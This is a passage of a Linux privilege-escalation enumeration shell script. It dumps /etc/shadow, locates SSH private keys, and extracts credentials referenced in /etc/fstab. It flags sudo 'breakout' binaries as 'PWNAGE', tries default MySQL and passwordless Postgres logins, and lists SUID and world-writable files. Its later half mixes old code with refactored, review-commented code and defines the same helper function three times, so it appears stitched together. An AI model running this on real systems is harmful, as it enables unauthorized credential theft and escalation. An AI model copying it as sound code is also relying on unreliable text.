system:\e[00m\n$lastlogedonusrs" 183 | echo -e "\n" 184 | else 185 | : 186 | fi 187 | fi 188 | 189 | usrsinfo=`cat /etc/passwd | cut -d ":" -f 1,2,3,4 2>/dev/null` 190 | if [ "$outfile" ];then 191 | if [ "$usrsinfo" ]; then 192 | echo -e "All users and uid/gid info:\n$usrsinfo" >> $outfile 193 | echo -e "\n" >> $outfile 194 | else 195 | : 196 | fi 
197 | else 198 | if [ "$usrsinfo" ]; then 199 | echo -e "\e[00;31mAll users and uid/gid info:\e[00m\n$usrsinfo" 200 | echo -e "\n" 201 | else 202 | : 203 | fi 204 | fi 205 | 206 | hashesinpasswd=`grep -v '^[^:]*:[x]' /etc/passwd 2>/dev/null` 207 | if [ "$outfile" ]; then 208 | if [ "$hashesinpasswd" ]; then 209 | echo -e "It looks like we have password hashes in /etc/passwd!\n$hashesinpasswd" >> $outfile 210 | echo -e "\n" >> $outfile 211 | else 212 | : 213 | fi 214 | else 215 | if [ "$hashesinpasswd" ]; then 216 | echo -e "\e[00;33mIt looks like we have password hashes in /etc/passwd!\e[00m\n$hashesinpasswd" 217 | echo -e "\n" 218 | else 219 | : 220 | fi 221 | fi 222 | 223 | #locate custom user accounts with some 'known default' uids 224 | readpasswd=`grep -v "^#" /etc/passwd | awk -F: '$3 == 0 || $3 == 500 || $3 == 501 || $3 == 502 || $3 == 1000 || $3 == 1001 || $3 == 1002 || $3 == 2000 || $3 == 2001 || $3 == 2002 { print }'` 225 | if [ "$outfile" ]; then 226 | if [ "$readpasswd" ]; then 227 | echo -e "Sample entires from /etc/passwd (searching for uid values 0, 500, 501, 502, 1000, 1001, 1002, 2000, 2001, 2002):\n$readpasswd" >> $outfile 228 | echo -e "\n" >> $outfile 229 | else 230 | : 231 | fi 232 | else 233 | if [ "$readpasswd" ]; then 234 | echo -e "\e[00;31mSample entires from /etc/passwd (searching for uid values 0, 500, 501, 502, 1000, 1001, 1002, 2000, 2001, 2002):\e[00m\n$readpasswd" 235 | echo -e "\n" 236 | else 237 | : 238 | fi 239 | fi 240 | 241 | readshadow=`cat /etc/shadow 2>/dev/null` 242 | if [ "$outfile" ]; then 243 | if [ "$readshadow" ]; then 244 | echo -e "***We can read the shadow file!\n$readshadow" >> $outfile 245 | echo -e "\n" >> $outfile 246 | else 247 | : 248 | fi 249 | else 250 | if [ "$readshadow" ]; then 251 | echo -e "\e[00;33m***We can read the shadow file!\e[00m\n$readshadow" 252 | echo -e "\n" 253 | else 254 | : 255 | fi 256 | fi 257 | 258 | readmasterpasswd=`cat /etc/master.passwd 2>/dev/null` 259 | if [ "$outfile" ]; then 260 
| if [ "$readmasterpasswd" ]; then 261 | echo -e "***We can read the master.passwd file!\n$readmasterpasswd" >> $outfile 262 | echo -e "\n" >> $outfile 263 | else 264 | : 265 | fi 266 | else 267 | if [ "$readmasterpasswd" ]; then 268 | echo -e "\e[00;33m***We can read the master.passwd file!\e[00m\n$readmasterpasswd" 269 | echo -e "\n" 270 | else 271 | : 272 | fi 273 | fi 274 | 275 | #all root accounts (uid 0) 276 | if [ "$outfile" ]; then 277 | echo -e "Super user account(s):" >> $outfile; grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1 }' >> $outfile 278 | echo -e "\n" >> $outfile 279 | else 280 | echo -e "\e[00;31mSuper user account(s):\e[00m"; grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' 281 | echo -e "\n" 282 | fi 283 | 284 | #pull out vital sudoers info 285 | sudoers=`cat /etc/sudoers 2>/dev/null` 286 | if [ "$outfile" ]; then 287 | if [ "$sudoers" ]; then 288 | echo -e "Sudoers configuration:" >> $outfile; cat /etc/sudoers 2>/dev/null | grep -A 1 "User priv" >> $outfile; cat /etc/sudoers | grep -A 1 "Allow" >> $outfile 289 | echo -e "\n" >> $outfile 290 | else 291 | : 292 | fi 293 | else 294 | if [ "$sudoers" ]; then 295 | echo -e "\e[00;31mSudoers configuration:\e[00m"; cat /etc/sudoers 2>/dev/null | grep -A 1 "User priv"; cat /etc/sudoers | grep -A 1 "Allow" 296 | echo -e "\n" 297 | else 298 | : 299 | fi 300 | fi 301 | 302 | #can we sudo without supplying a password 303 | sudoperms=`echo '' | sudo -S -l 2>/dev/null` 304 | if [ "$outfile" ]; then 305 | if [ "$sudoperms" ]; then 306 | echo -e "We can sudo without supplying a password!\n$sudoperms" >> $outfile 307 | echo -e "\n" >> $outfile 308 | else 309 | : 310 | fi 311 | else 312 | if [ "$sudoperms" ]; then 313 | echo -e "\e[00;33mWe can sudo without supplying a password!\e[00m\n$sudoperms" 314 | echo -e "\n" 315 | else 316 | : 317 | fi 318 | fi 319 | 320 | #known 'good' breakout binaries 321 | sudopwnage=`echo '' | sudo -S -l 2>/dev/null | grep -w 
'nmap\|perl\|'awk'\|'find'\|'bash'\|'sh'\|'man'\|'more'\|'less'\|'vi'\|'vim'\|'nc'\|'netcat'\|python\|ruby\|lua\|irb' | xargs -r ls -la 2>/dev/null` 322 | if [ "$outfile" ]; then 323 | if [ "$sudopwnage" ]; then 324 | echo -e "***Possible Sudo PWNAGE!\n$sudopwnage" >> $outfile 325 | echo -e "\n" >> $outfile 326 | else 327 | : 328 | fi 329 | else 330 | if [ "$sudopwnage" ]; then 331 | echo -e "\e[00;33m***Possible Sudo PWNAGE!\e[00m\n$sudopwnage" 332 | echo -e "\n" 333 | else 334 | : 335 | fi 336 | fi 337 | 338 | rthmdir=`ls -ahl /root/ 2>/dev/null` 339 | if [ "$outfile" ]; then 340 | if [ "$rthmdir" ]; then 341 | echo -e "***We can read root's home directory!\n$rthmdir" >> $outfile 342 | echo -e "\n" >> $outfile 343 | else 344 | : 345 | fi 346 | else 347 | if [ "$rthmdir" ]; then 348 | echo -e "\e[00;33m***We can read root's home directory!\e[00m\n$rthmdir" 349 | echo -e "\n" 350 | else 351 | : 352 | fi 353 | fi 354 | 355 | homedirperms=`ls -ahl /home/ 2>/dev/null` 356 | if [ "$outfile" ]; then 357 | if [ "$homedirperms" ]; then 358 | echo -e "Are permissions on /home directories lax:\n$homedirperms" >> $outfile 359 | echo -e "\n" >> $outfile 360 | else 361 | : 362 | fi 363 | else 364 | if [ "$homedirperms" ]; then 365 | echo -e "\e[00;31mAre permissions on /home directories lax:\e[00m\n$homedirperms" 366 | echo -e "\n" 367 | else 368 | : 369 | fi 370 | fi 371 | 372 | wrfileshm=`find /home/ -perm -4 -type f -exec ls -al {} \; 2>/dev/null` 373 | if [ "$outfile" ]; then 374 | if [ "$wrfileshm" ]; then 375 | echo -e "World-readable files within /home:\n$wrfileshm" >> $outfile 376 | echo -e "\n" >> $outfile 377 | else 378 | : 379 | fi 380 | else 381 | if [ "$wrfileshm" ]; then 382 | echo -e "\e[00;31mWorld-readable files within /home:\e[00m\n$wrfileshm" 383 | echo -e "\n" 384 | else 385 | : 386 | fi 387 | fi 388 | 389 | homedircontents=`ls -ahl ~ 2>/dev/null` 390 | if [ "$outfile" ]; then 391 | if [ "$homedircontents" ]; then 392 | echo -e "Home directory 
contents:\n$homedircontents" >> $outfile 393 | echo -e "\n" >> $outfile 394 | else 395 | : 396 | fi 397 | else 398 | if [ "$homedircontents" ]; then 399 | echo -e "\e[00;31mHome directory contents:\e[00m\n$homedircontents" 400 | echo -e "\n" 401 | else 402 | : 403 | fi 404 | fi 405 | 406 | sshfiles=`find / -name "id_dsa*" -o -name "id_rsa*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" 2>/dev/null |xargs -r ls -la` 407 | if [ "$outfile" ];then 408 | if [ "$sshfiles" ]; then 409 | echo -e "SSH keys/host information found in the following locations:\n$sshfiles" >> $outfile 410 | echo -e "\n" >> $outfile 411 | else 412 | : 413 | fi 414 | else 415 | if [ "$sshfiles" ]; then 416 | echo -e "\e[00;31mSSH keys/host information found in the following locations:\e[00m\n$sshfiles" 417 | echo -e "\n" 418 | else 419 | : 420 | fi 421 | fi 422 | 423 | sshrootlogin=`grep "PermitRootLogin " /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | awk '{print $2}'` 424 | if [ "$outfile" ]; then 425 | if [ "$sshrootlogin" = "yes" ]; then 426 | echo -e "Root is allowed to login via SSH:" >> $outfile; grep "PermitRootLogin " /etc/ssh/sshd_config 2>/dev/null | grep -v "#" >> $outfile 427 | echo -e "\n" >> $outfile 428 | else 429 | : 430 | fi 431 | else 432 | if [ "$sshrootlogin" = "yes" ]; then 433 | echo -e "\e[00;31mRoot is allowed to login via SSH:\e[00m"; grep "PermitRootLogin " /etc/ssh/sshd_config 2>/dev/null | grep -v "#" 434 | echo -e "\n" 435 | else 436 | : 437 | fi 438 | fi 439 | 440 | if [ "$outfile" ]; then 441 | echo -e "### ENVIRONMENTAL #######################################" >> $outfile 442 | else 443 | echo -e "\e[00;34m### ENVIRONMENTAL #######################################\e[00m" 444 | fi 445 | 446 | pathinfo=`echo $PATH 2>/dev/null` 447 | if [ "$outfile" ]; then 448 | if [ "$pathinfo" ]; then 449 | echo -e "Path information:\n$pathinfo" >> $outfile 450 | echo -e "\n" >> $outfile 451 | else 452 | : 453 | fi 454 | else 455 | if [ "$pathinfo" 
]; then 456 | echo -e "\e[00;31mPath information:\e[00m\n$pathinfo" 457 | echo -e "\n" 458 | else 459 | : 460 | fi 461 | fi 462 | 463 | shellinfo=`cat /etc/shells 2>/dev/null` 464 | if [ "$outfile" ]; then 465 | if [ "$shellinfo" ]; then 466 | echo -e "Available shells:\n$shellinfo" >> $outfile 467 | echo -e "\n" >> $outfile 468 | else 469 | : 470 | fi 471 | else 472 | if [ "$shellinfo" ]; then 473 | echo -e "\e[00;31mAvailable shells:\e[00m\n$shellinfo" 474 | echo -e "\n" 475 | else 476 | : 477 | fi 478 | fi 479 | 480 | if [ "$outfile" ]; then 481 | echo -e "### JOBS/TASKS ##########################################" >> $outfile 482 | else 483 | echo -e "\e[00;34m### JOBS/TASKS ##########################################\e[00m" 484 | fi 485 | 486 | cronjobs=`ls -la /etc/cron* 2>/dev/null` 487 | if [ "$outfile" ]; then 488 | if [ "$cronjobs" ]; then 489 | echo -e "Cron jobs:\n$cronjobs" >> $outfile 490 | echo -e "\n" >> $outfile 491 | else 492 | : 493 | fi 494 | else 495 | if [ "$cronjobs" ]; then 496 | echo -e "\e[00;31mCron jobs:\e[00m\n$cronjobs" 497 | echo -e "\n" 498 | else 499 | : 500 | fi 501 | fi 502 | 503 | cronjobwwperms=`find /etc/cron* -perm -0002 -exec ls -la {} \; -exec cat {} 2>/dev/null \;` 504 | if [ "$outfile" ]; then 505 | if [ "$cronjobwwperms" ]; then 506 | echo -e "***World-writable cron jobs and file contents:\n$cronjobwwperms" >> $outfile 507 | echo -e "\n" >> $outfile 508 | else 509 | : 510 | fi 511 | else 512 | if [ "$cronjobwwperms" ]; then 513 | echo -e "\e[00;33m***World-writable cron jobs and file contents:\e[00m\n$cronjobwwperms" 514 | echo -e "\n" 515 | else 516 | : 517 | fi 518 | fi 519 | 520 | crontab=`cat /etc/crontab 2>/dev/null` 521 | if [ "$outfile" ]; then 522 | if [ "$crontab" ]; then 523 | echo -e "Crontab contents:\n$crontab" >> $outfile 524 | echo -e "\n" >> $outfile 525 | else 526 | : 527 | fi 528 | else 529 | if [ "$crontab" ]; then 530 | echo -e "\e[00;31mCrontab contents:\e[00m\n$crontab" 531 | echo -e "\n" 532 | else 
533 | : 534 | fi 535 | fi 536 | 537 | cronallowdeny=`ls -la /etc/cron.allow 2>/dev/null && cat /etc/cron.allow 2>/dev/null; ls -la /etc/cron.deny 2>/dev/null && cat /etc/cron.deny 2>/dev/null` 538 | if [ "$outfile" ]; then 539 | if [ "$cronallowdeny" ]; then 540 | echo -e "Cron Alloy/Deny entries:\n$cronallowdeny" >> $outfile 541 | echo -e "\n" >> $outfile 542 | else 543 | : 544 | fi 545 | else 546 | if [ "$cronallowdeny" ]; then 547 | echo -e "\e[00;31mCron Alloy/Deny entries:\e[00m\n$cronallowdeny" 548 | echo -e "\n" 549 | else 550 | : 551 | fi 552 | fi 553 | 554 | crontabvar=`ls -la /var/spool/cron/crontabs 2>/dev/null` 555 | if [ "$outfile" ]; then 556 | if [ "$crontabvar" ]; then 557 | echo -e "Anything interesting in /var/spool/cron/crontabs:\n$crontabvar" >> $outfile 558 | echo -e "\n" >> $outfile 559 | else 560 | : 561 | fi 562 | else 563 | if [ "$crontabvar" ]; then 564 | echo -e "\e[00;31mAnything interesting in /var/spool/cron/crontabs:\e[00m\n$crontabvar" 565 | echo -e "\n" 566 | else 567 | : 568 | fi 569 | fi 570 | 571 | anacronjobs=`ls -la /etc/anacrontab 2>/dev/null; cat /etc/anacrontab 2>/dev/null` 572 | if [ "$outfile" ]; then 573 | if [ "$anacronjobs" ]; then 574 | echo -e "Anacron jobs and associated file permissions:\n$anacronjobs" >> $outfile 575 | echo -e "\n" >> $outfile 576 | else 577 | : 578 | fi 579 | else 580 | if [ "$anacronjobs" ]; then 581 | echo -e "\e[00;31mAnacron jobs and associated file permissions:\e[00m\n$anacronjobs" 582 | echo -e "\n" 583 | else 584 | : 585 | fi 586 | fi 587 | 588 | anacrontab=`ls -la /var/spool/anacron 2>/dev/null` 589 | if [ "$outfile" ]; then 590 | if [ "$anacrontab" ]; then 591 | echo -e "When were jobs last executed (/var/spool/anacron contents):\n$anacrontab" >> $outfile 592 | echo -e "\n" >> $outfile 593 | else 594 | : 595 | fi 596 | else 597 | if [ "$anacrontab" ]; then 598 | echo -e "\e[00;31mWhen were jobs last executed (/var/spool/anacron contents):\e[00m\n$anacrontab" 599 | echo -e "\n" 600 | else 
601 | : 602 | fi 603 | fi 604 | 605 | #pull out account names from /etc/passwd and see if any users have associated cronjobs (priv command) 606 | cronother=`cat /etc/passwd | cut -d ":" -f 1 | xargs -n1 crontab -l -u 2>/dev/null` 607 | if [ "$outfile" ]; then 608 | if [ "$cronother" ]; then 609 | echo -e "Jobs held by all users:\n$cronother" >> $outfile 610 | echo -e "\n" >> $outfile 611 | else 612 | : 613 | fi 614 | else 615 | if [ "$cronother" ]; then 616 | echo -e "\e[00;31mJobs held by all users:\e[00m\n$cronother" 617 | echo -e "\n" 618 | else 619 | : 620 | fi 621 | fi 622 | 623 | if [ "$outfile" ]; then 624 | echo -e "### NETWORKING ##########################################" >> $outfile 625 | else 626 | echo -e "\e[00;34m### NETWORKING ##########################################\e[00m" 627 | fi 628 | 629 | nicinfo=`/sbin/ifconfig -a 2>/dev/null` 630 | if [ "$outfile" ]; then 631 | if [ "$nicinfo" ]; then 632 | echo -e "Network & IP info:\n$nicinfo" >> $outfile 633 | echo -e "\n" >> $outfile 634 | else 635 | : 636 | fi 637 | else 638 | if [ "$nicinfo" ]; then 639 | echo -e "\e[00;31mNetwork & IP info:\e[00m\n$nicinfo" 640 | echo -e "\n" 641 | else 642 | : 643 | fi 644 | fi 645 | 646 | nsinfo=`cat /etc/resolv.conf 2>/dev/null | grep "nameserver"` 647 | if [ "$outfile" ]; then 648 | if [ "$nsinfo" ]; then 649 | echo -e "Nameserver(s):\n$nsinfo" >> $outfile 650 | echo -e "\n" >> $outfile 651 | else 652 | : 653 | fi 654 | else 655 | if [ "$nsinfo" ]; then 656 | echo -e "\e[00;31mNameserver(s):\e[00m\n$nsinfo" 657 | echo -e "\n" 658 | else 659 | : 660 | fi 661 | fi 662 | 663 | defroute=`route 2>/dev/null | grep default` 664 | if [ "$outfile" ]; then 665 | if [ "$defroute" ]; then 666 | echo -e "Default route:\n$defroute" >> $outfile 667 | echo -e "\n" >> $outfile 668 | else 669 | : 670 | fi 671 | else 672 | if [ "$defroute" ]; then 673 | echo -e "\e[00;31mDefault route:\e[00m\n$defroute" 674 | echo -e "\n" 675 | else 676 | : 677 | fi 678 | fi 679 | 680 | 
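# Print one finding: heading, collected text, then two blank lines.
#   $1 - ANSI colour number used on the terminal (31 red, 33 yellow)
#   $2 - heading written to the report file
#   $3 - collected text; nothing is printed when it is empty
#   $4 - optional heading for the terminal, defaults to $2
# Reads the global $outfile: when set, output is appended there uncoloured.
# Collected text is printed with %s so backslash sequences inside file
# contents or process names are shown verbatim instead of being interpreted.
# NOTE(review): the report aggregates sensitive host data and nothing here
# restricts the mode of $outfile; confirm the caller sets a restrictive umask.
report_finding() {
  local colour=$1 heading=$2 body=$3 term_heading=${4:-$2}
  [ -n "$body" ] || return 0
  if [ "$outfile" ]; then
    printf '%s\n%s\n\n\n' "$heading" "$body" >> "$outfile"
  else
    printf '\e[00;%sm%s\e[00m\n%s\n\n\n' "$colour" "$term_heading" "$body"
  fi
}

# Print a section banner (blue on the terminal, plain in the report file).
report_banner() {
  if [ "$outfile" ]; then
    printf '%s\n' "$1" >> "$outfile"
  else
    printf '\e[00;34m%s\e[00m\n' "$1"
  fi
}

# netstat -a lists every socket, so established connections appear
# alongside the listeners the headings mention.
tcpservs=$(netstat -antp 2>/dev/null)
report_finding 31 "Listening TCP:" "$tcpservs"

udpservs=$(netstat -anup 2>/dev/null)
report_finding 31 "Listening UDP:" "$udpservs"

report_banner "### SERVICES #############################################"

psaux=$(ps aux 2>/dev/null)
report_finding 31 "Running processes:" "$psaux"

# Look up each process binary path and its permissions; the trailing awk
# drops duplicate lines while keeping first-seen order.
procperm=$(ps aux | awk '{print $11}' | xargs -r ls -la 2>/dev/null | awk '!x[$0]++')
report_finding 31 "Process binaries & associated permissions (from above list):" "$procperm"

inetdread=$(cat /etc/inetd.conf 2>/dev/null)
report_finding 31 "Contents of /etc/inetd.conf:" "$inetdread"

# Very rough extraction of the server binary (7th field) from inetd.conf,
# followed by a permission listing of each.
inetdbinperms=$(awk '{print $7}' /etc/inetd.conf 2>/dev/null | xargs -r ls -la 2>/dev/null)
report_finding 31 "The related inetd binary permissions:" "$inetdbinperms"

xinetdread=$(cat /etc/xinetd.conf 2>/dev/null)
report_finding 31 "Contents of /etc/xinetd.conf:" "$xinetdread"

# When xinetd.conf references /etc/xinetd.d, list that directory.
# The heading is printed even if the listing is empty. In report mode the
# heading now goes to the report file together with the listing; before,
# only the listing was redirected and the heading leaked to stdout.
xinetdincd=$(grep "/etc/xinetd.d" /etc/xinetd.conf 2>/dev/null)
if [ "$xinetdincd" ]; then
  xinetd_heading="/etc/xinetd.d is included in /etc/xinetd.conf - associated binary permissions are listed below:"
  if [ "$outfile" ]; then
    {
      printf '%s\n' "$xinetd_heading"
      ls -la /etc/xinetd.d 2>/dev/null
      printf '\n\n'
    } >> "$outfile"
  else
    printf '\e[00;31m%s\e[00m\n' "$xinetd_heading"
    ls -la /etc/xinetd.d 2>/dev/null
    printf '\n\n'
  fi
fi
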
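# Print one finding: heading, collected text, then two blank lines.
#   $1 - ANSI colour number used on the terminal (31 red, 33 yellow)
#   $2 - heading written to the report file
#   $3 - collected text; nothing is printed when it is empty
#   $4 - optional heading for the terminal, defaults to $2
# Reads the global $outfile: when set, output is appended there uncoloured.
# Collected text is printed with %s so backslash sequences inside file
# contents are shown verbatim instead of being interpreted.
# NOTE(review): the report aggregates sensitive host data and nothing here
# restricts the mode of $outfile; confirm the caller sets a restrictive umask.
report_finding() {
  local colour=$1 heading=$2 body=$3 term_heading=${4:-$2}
  [ -n "$body" ] || return 0
  if [ "$outfile" ]; then
    printf '%s\n%s\n\n\n' "$heading" "$body" >> "$outfile"
  else
    printf '\e[00;%sm%s\e[00m\n%s\n\n\n' "$colour" "$term_heading" "$body"
  fi
}

# Print a section banner (blue on the terminal, plain in the report file).
report_banner() {
  if [ "$outfile" ]; then
    printf '%s\n' "$1" >> "$outfile"
  else
    printf '\e[00;34m%s\e[00m\n' "$1"
  fi
}

# Very rough extraction of the server binary (7th field) from xinetd.conf,
# followed by a permission listing of each. In report mode the original
# wrote `echo ...; >> $outfile`, so the text went to stdout and the report
# only got touched; the finding is now appended to the report.
xinetdbinperms=$(awk '{print $7}' /etc/xinetd.conf 2>/dev/null | xargs -r ls -la 2>/dev/null)
report_finding 31 "The related xinetd binary permissions:" "$xinetdbinperms"

initdread=$(ls -la /etc/init.d 2>/dev/null)
report_finding 31 "/etc/init.d/ binary permissions:" "$initdread"

rcdread=$(ls -la /etc/rc.d/init.d 2>/dev/null)
report_finding 31 "/etc/rc.d/init.d binary permissions:" "$rcdread"

usrrcdread=$(ls -la /usr/local/etc/rc.d 2>/dev/null)
report_finding 31 "/usr/local/etc/rc.d binary permissions:" "$usrrcdread"

report_banner "### SOFTWARE #############################################"

# stderr is silenced on sudo itself (it was attached to grep), so a host
# without sudo no longer prints "command not found".
sudover=$(sudo -V 2>/dev/null | grep "Sudo version")
report_finding 31 "Sudo version:" "$sudover"

mysqlver=$(mysql --version 2>/dev/null)
report_finding 31 "MYSQL version:" "$mysqlver"

# Default-credential checks against the local database services. A hit
# means the service should be given a real password / locked-down auth.
mysqlconnect=$(mysqladmin -uroot -proot version 2>/dev/null)
report_finding 33 "***We can connect to the local MYSQL service with default root/root credentials!" "$mysqlconnect"

mysqlconnectnopass=$(mysqladmin -uroot version 2>/dev/null)
report_finding 33 "***We can connect to the local MYSQL service as 'root' and without a password!" "$mysqlconnectnopass"

postgver=$(psql -V 2>/dev/null)
report_finding 31 "Postgres version:" "$postgver"

postcon1=$(psql -U postgres template0 -c 'select version()' 2>/dev/null | grep version)
report_finding 33 \
  "***We can connect to Postgres DB 'template0' as user 'postgres' with no password!" \
  "$postcon1" \
  "***We can connect to Postgres DB 'template0' as user 'postgres' with no password!:"

postcon11=$(psql -U postgres template1 -c 'select version()' 2>/dev/null | grep version)
report_finding 33 \
  "***We can connect to Postgres DB 'template1' as user 'postgres' with no password!" \
  "$postcon11" \
  "***We can connect to Postgres DB 'template1' as user 'postgres' with no password!:"

# The account probed here is 'pgsql'; the message used to name 'psql'.
postcon2=$(psql -U pgsql template0 -c 'select version()' 2>/dev/null | grep version)
report_finding 33 \
  "***We can connect to Postgres DB 'template0' as user 'pgsql' with no password!" \
  "$postcon2" \
  "***We can connect to Postgres DB 'template0' as user 'pgsql' with no password!:"

postcon22=$(psql -U pgsql template1 -c 'select version()' 2>/dev/null | grep version)
report_finding 33 \
  "***We can connect to Postgres DB 'template1' as user 'pgsql' with no password!" \
  "$postcon22" \
  "***We can connect to Postgres DB 'template1' as user 'pgsql' with no password!:"

apachever=$(apache2 -v 2>/dev/null; httpd -v 2>/dev/null)
report_finding 31 "Apache version:" "$apachever"

# User/group lines from the Apache envvars file with the "export " prefix
# removed (the stray backslash in the old awk pattern is dropped).
apacheusr=$(grep -i 'user\|group' /etc/apache2/envvars 2>/dev/null | awk '{sub(/.*export /,"")}1')
report_finding 31 "Apache user configuration:" "$apacheusr"

report_banner "### INTERESTING FILES ####################################"

# Both headings below are printed unconditionally, as before, even when
# none of the tools or files exist.
if [ "$outfile" ]; then
  {
    printf '%s\n' "Useful file locations:"
    for tool in nc netcat wget nmap gcc; do
      which "$tool" 2>/dev/null
    done
    printf '\n\n'
    printf '%s\n' "Can we read/write sensitive files:"
    for sensitive in /etc/passwd /etc/group /etc/profile /etc/shadow /etc/master.passwd; do
      ls -la "$sensitive" 2>/dev/null
    done
    printf '\n\n'
  } >> "$outfile"
else
  printf '\e[00;31m%s\e[00m\n' "Useful file locations:"
  for tool in nc netcat wget nmap gcc; do
    which "$tool" 2>/dev/null
  done
  printf '\n\n'
  printf '\e[00;31m%s\e[00m\n' "Can we read/write sensitive files:"
  for sensitive in /etc/passwd /etc/group /etc/profile /etc/shadow /etc/master.passwd; do
    ls -la "$sensitive" 2>/dev/null
  done
  printf '\n\n'
fi

findsuid=$(find / -perm -4000 -type f 2>/dev/null)
report_finding 31 "SUID files:" "$findsuid"

# SUID files whose path contains one of these words; each such binary
# should be reviewed for whether it needs the bit at all.
# NOTE(review): xargs splits on whitespace, so paths with spaces are
# listed incorrectly.
intsuid=$(find / -perm -4000 -type f 2>/dev/null \
  | grep -w 'nmap\|perl\|awk\|find\|bash\|sh\|man\|more\|less\|vi\|vim\|nc\|netcat\|python\|ruby\|lua\|irb\|pl' \
  | xargs -r ls -la)
report_finding 33 "***Possibly interesting SUID files:" "$intsuid"
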
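# Print one finding: heading, collected text, then two blank lines.
#   $1 - ANSI colour number used on the terminal (31 red, 33 yellow)
#   $2 - heading written to the report file
#   $3 - collected text; nothing is printed when it is empty
#   $4 - optional heading for the terminal, defaults to $2
# Reads the global $outfile: when set, output is appended there uncoloured.
# Collected text is printed with %s so backslash sequences inside file
# contents are shown verbatim instead of being interpreted.
# NOTE(review): the report aggregates sensitive host data (including any
# credentials found in /etc/fstab) and nothing here restricts the mode of
# $outfile; confirm the caller sets a restrictive umask.
report_finding() {
  local colour=$1 heading=$2 body=$3 term_heading=${4:-$2}
  [ -n "$body" ] || return 0
  if [ "$outfile" ]; then
    printf '%s\n%s\n\n\n' "$heading" "$body" >> "$outfile"
  else
    printf '\e[00;%sm%s\e[00m\n%s\n\n\n' "$colour" "$term_heading" "$body"
  fi
}

# "World-writable" is the o+w bit (0002). The old masks -4007 / -2007 also
# demanded o+r and o+x, so a set-id file that was writable but not
# readable/executable by others was missed.
wwsuid=$(find / -perm -4002 -type f 2>/dev/null)
report_finding 31 "World-writable SUID files:" "$wwsuid"

wwsuidrt=$(find / -uid 0 -perm -4002 -type f 2>/dev/null)
report_finding 31 "World-writable SUID files owned by root:" "$wwsuidrt"

findguid=$(find / -perm -2000 -type f 2>/dev/null)
report_finding 31 "GUID files:" "$findguid"

# SGID files whose path contains one of these words.
# NOTE(review): xargs splits on whitespace, so paths with spaces are
# listed incorrectly.
intguid=$(find / -perm -2000 -type f 2>/dev/null \
  | grep -w 'nmap\|perl\|awk\|find\|bash\|sh\|man\|more\|less\|vi\|vim\|nc\|netcat\|python\|ruby\|lua\|irb\|pl' \
  | xargs -r ls -la)
report_finding 33 "***Possibly interesting GUID files:" "$intguid"

wwguid=$(find / -perm -2002 -type f 2>/dev/null)
report_finding 31 "World-writable GUID files:" "$wwguid"

# The terminal heading used to read "AWorld-writable ..." (typo).
wwguidrt=$(find / -uid 0 -perm -2002 -type f 2>/dev/null)
report_finding 31 "World-writable GUID files owned by root:" "$wwguidrt"

# All world-writable files, excluding /proc.
wwfiles=$(find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null)
report_finding 31 "World-writable files (excluding /proc):" "$wwfiles"

# The -iname patterns are quoted so the shell cannot expand them against
# the current directory before find sees them.
usrplan=$(find /home -iname '*.plan' -exec ls -la {} \; -exec cat {} \; 2>/dev/null)
report_finding 31 "Plan file permissions and contents:" "$usrplan"

bsdusrplan=$(find /usr/home -iname '*.plan' -exec ls -la {} \; -exec cat {} \; 2>/dev/null)
report_finding 31 "Plan file permissions and contents:" "$bsdusrplan"

rhostsusr=$(find /home -iname '*.rhosts' -exec ls -la {} \; -exec cat {} \; 2>/dev/null)
report_finding 31 "rhost config file(s) and file contents:" "$rhostsusr"

bsdrhostsusr=$(find /usr/home -iname '*.rhosts' -exec ls -la {} \; -exec cat {} \; 2>/dev/null)
report_finding 31 "rhost config file(s) and file contents:" "$bsdrhostsusr"

rhostssys=$(find /etc -iname hosts.equiv -exec ls -la {} \; -exec cat {} \; 2>/dev/null)
report_finding 31 "Hosts.equiv file details and file contents:" "$rhostssys" \
  "Hosts.equiv file details and file contents: "

nfsexports=$(ls -la /etc/exports 2>/dev/null; cat /etc/exports 2>/dev/null)
report_finding 31 "NFS config details:" "$nfsexports" "NFS config details: "

# Mount options in /etc/fstab that embed credentials. Each pipeline keeps
# the text between "<key>=" and the next comma. The stray backslashes in
# the old awk patterns (\u, \p, \d, \,) are removed.
fstab=$(
  grep username /etc/fstab 2>/dev/null \
    | awk '{sub(/.*username=/,"");sub(/,.*/,"")}1' | xargs -r echo username:
  grep password /etc/fstab 2>/dev/null \
    | awk '{sub(/.*password=/,"");sub(/,.*/,"")}1' | xargs -r echo password:
  grep domain /etc/fstab 2>/dev/null \
    | awk '{sub(/.*domain=/,"");sub(/,.*/,"")}1' | xargs -r echo domain:
)
report_finding 33 "***Looks like there are credentials in /etc/fstab!" "$fstab"

# Credentials files referenced from /etc/fstab. The path is cut at the next
# comma or whitespace and handed to ls/cat as a single argument. The old
# form pasted it into `sh -c '...'`, so shell metacharacters in an fstab
# entry would have been executed.
fstabcred=$(
  grep cred /etc/fstab 2>/dev/null \
    | awk '{sub(/.*credentials=/,"");sub(/[, \t].*/,"")}1' \
    | while IFS= read -r credfile; do
        [ -n "$credfile" ] || continue
        ls -la -- "$credfile"
        cat -- "$credfile"
      done
)
report_finding 33 "***/etc/fstab contains a credentials file!" "$fstabcred"

# Search files by name pattern for a keyword and report matching lines.
#   $1 - keyword handed to grep as a pattern
#   $2 - file name pattern for find -name (e.g. *.conf)
#   $3 - maximum directory depth below /
# Reads the global $outfile to choose between the report file and the
# terminal. Output lines have the form filepath:line number:matching text.
# The pattern, keyword and depth are quoted so they reach find/grep
# unexpanded, and the "not found" heading now names the keyword and depth
# actually searched (it used to print $keyword and a fixed "4").
searches() {
  local searchme=$1 searchfile=$2 depth=$3
  local searchkey found_heading missing_heading

  if [ "$searchme" = "" ]; then
    if [ "$outfile" ]; then
      printf '%s\n\n' "Can't search $searchfile files as no keyword was entered" >> "$outfile"
    else
      printf '%s\n\n' "Can't search $searchfile files as no keyword was entered"
    fi
    return 0
  fi

  searchkey=$(find / -maxdepth "$depth" -name "$searchfile" -type f \
    -exec grep -Hn -- "$searchme" {} \; 2>/dev/null)
  found_heading="Search keyword(s) ($searchme) (recursive $depth levels - output format filepath:identified line number where keyword appears):"
  missing_heading="Search keyword(s) ($searchme) (recursive $depth levels):"

  if [ "$searchkey" ]; then
    if [ "$outfile" ]; then
      printf '%s\n%s\n\n\n' "$found_heading" "$searchkey" >> "$outfile"
    else
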